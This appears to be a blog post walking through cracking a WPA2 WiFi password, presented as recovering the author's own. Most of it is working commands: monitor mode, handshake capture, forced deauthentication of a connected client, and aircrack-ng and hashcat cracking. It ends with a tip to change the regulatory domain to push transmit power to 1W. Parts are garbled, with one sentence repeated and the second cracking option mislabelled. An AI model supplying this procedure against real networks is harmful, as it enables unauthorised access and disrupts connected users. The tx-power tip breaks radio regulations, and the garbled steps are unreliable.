I forgot my WIFI password

Tomas Savenas
3 min readFeb 5, 2019


Oh, it’s no longer a problem…

I want to show how I decrypt my WIFI password.The essential tool in wireless security testing is the wireless adapter. It must support packet injection into a wireless stream and monitoring mode. Usually, standard adapters support monitoring mode, and you will be able to run airodump-ng command and listen to wireless traffic around your self. But injection mode is required to run aireplay-ng command. A list of supported adapters is here [1]

I used only these tools below:

  • Laptop with GPU
  • Alfa AWUS036AC adapter
  • Latest Kali Linux

My virtual machine with Kali Linux [2] is ready. I need to make sure my WIFI adapter is attached to the virtual machine.

On “ Virtualbox” toolbar:

Settings > Ports > USB > + > USB Realtek adapter

Once the operating system has loaded, default user root and password toor On a new terminal window I have to check for available WIFI devices:


I see a device with a name wlan0.

# Optionally, but it’s not necessary to upgrade package.
sudo apt update && apt upgrade -y

By default, the latest Kali has “Hashcat”, “Aircrack-ng” and other tools preinstalled. But it’s possible to use these tools with Ubuntu or another distro.

# Optionally, if OS is not Kali
sudo apt install hashcat aircrack-ng -y

My Alfa adapter is capable of sniffing and injecting packets. I need to switch the adapter into the monitoring mode. Usually, WIFI adapters are recognized as wlan0and then it goes into monitoring mode wlan0mon

airmon-ng check kill && airmon-ng start wlan0

I have to scan the wireless network area and get more technical details about my access point.

airodump-ng wlan0mon

From the output, I see the WIFI signal is strong, packets are increasing, and the channel number is 5. My goal is to catch only my handshake. I have to specify the arguments and start capturing packets into a file.

airodump-ng wlan0mon --channel 5 --bssid 55:CC:BB:11:LT:12 --write mywifi --force

It’s essential to have at least one device connected to WIFI station. During the full handshake phase, a master key is exchanging in between client and WIFI station. That can achieve with the client’s de-authentication method. On a new terminal, I ran the command with additional arguments for client and access point and the number of de-authentication attempts.

aireplay-ng wlan0mon -a 55:CC:BB:11:LT:12 -c 55:44:44:68:73:65 -0 99

I am waiting for a message WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen. (terminal with airodump-ng ) after a few moments, it appears on my screen.

I have two option:

I can use a list of the most common passwords — aircrack-ng with the dictionary attack.

aircrack-ng -a 2 -b 55:CC:BB:11:LT:12 -w wordlist.txt mywifi-01.cap

I can use a list of the most common passwords — aircrack-ng with the dictionary attack. I can use a list of the most common passwords — aircrack-ng with the dictionary attack.

aircrack-ng -j hashcat mywifi-01.cap
# And it's time for hashcat :)
sudo hashcat -m 2500 -a 3 hashcat.hccapx ?d?d?d?d?d?d?d?d --potfile-path wpa2.pot

Results hash, SSID name, and my password printed in the terminal and saved in file with a name “wpa2.pot”

One more thing with this configuration you will need increaser tx power up to 1W

Tested on a AWUS036H

ifconfig wlan0 down
iw reg set GY
ifconfig wlan0 up
ifconfig wlan0


#1 https://null-byte.wonderhowto.com/how-to/check-if-your-wireless-network-adapter-supports-monitor-mode-packet-injection-0191221/
#2 https://medium.com/@tomas_savenas/kali-2018-4-and-metasploit-framework-5-0-73190afc9d96



Tomas Savenas

Kibernetinio saugumo entuziastas; Aktyviausias Lietuvis TryHackMe platformoje; Inovacijų valdymo ir Antreprenerystės Magistrantas @ KTU